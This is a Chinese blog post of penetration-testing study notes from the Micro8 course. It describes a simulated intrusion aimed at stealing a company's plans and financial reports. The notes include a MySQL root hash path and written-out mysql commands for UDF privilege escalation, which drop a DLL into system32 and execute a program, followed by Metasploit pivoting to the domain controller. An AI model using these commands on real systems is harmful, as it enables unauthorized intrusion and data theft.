跟随micropoor前辈之渗透笔记(3)

此笔记的原书来源于Micropoor前辈的Micro8,这里我仅对我感兴趣的地方做些自己的学习笔记,开头会注明来自哪几节课。
以下来自第8节课
由于师傅写的已经很清楚了,这里只做思路和其他介绍

模拟诉求攻击情况介绍

事件过程:拿到该公司明年计划,拿到该公司今年报表,并且摸清该公司组织架构。盈利情 况。
思路:拿到一个目标主站(win08 R2)shell,搜集信息,然后拿下第二台服务器,搜集信息,读取root,msf提权,拿到域控和跨段服务器权限后,跳到个人主机获取文件。

思路

主机信息,端口,任务列表(tasklist,注意重点敏感任务),账户搜集,重要路径搜集(为未来可能需要dump file做准备),数据库等密码搜集(为未来可能需要碰撞做准备),杀软搜集,管理员习惯等

拿到第二台服务器后,搜集完信息,发现有mysql服务,读取root信息
mysql的root hash:MySQL\MySQL Server 5.0\data\mysql\user.MYD
然后写入shell
在实际情况中,交互的shell下运行mysql -uroot -pxxx无法继续交互,需要参数e解决这个 问题。

mysql -uroot -pxxxxxxxx mysql -e "create table a (cmd LONGBLOB);" 
mysql -uroot -pxxxxxxxx mysql -e "insert into a (cmd) values (hex(load_file('C:\\xxxx\\xxxx.dll')));"
如果限制上传大小同样可以hex解决上传大小问题。
mysql -uroot -pxxxxxxxx mysql -e "SELECT unhex(cmd) FROM a INTO DUMPFILE 'c:\\windows\\system32\\xxxx.dll';" mysql -uroot -pxxxxxxxx mysql -e "CREATE FUNCTION shell RETURNS STRING SONAME 'udf.dll'" 
mysql -uroot -pxxxxxxxx mysql -e "select shell('cmd','C:\\xxxx\\xxx\\xxxxx.exe');"

利用msf执行命令,转发等,拿到域控权限后,得到跨段服务器权限,进而打到个人机进行文件获取

发布了25 篇原创文章 · 获赞 14 · 访问量 5445

猜你喜欢

转载自blog.csdn.net/qq_40568770/article/details/105151243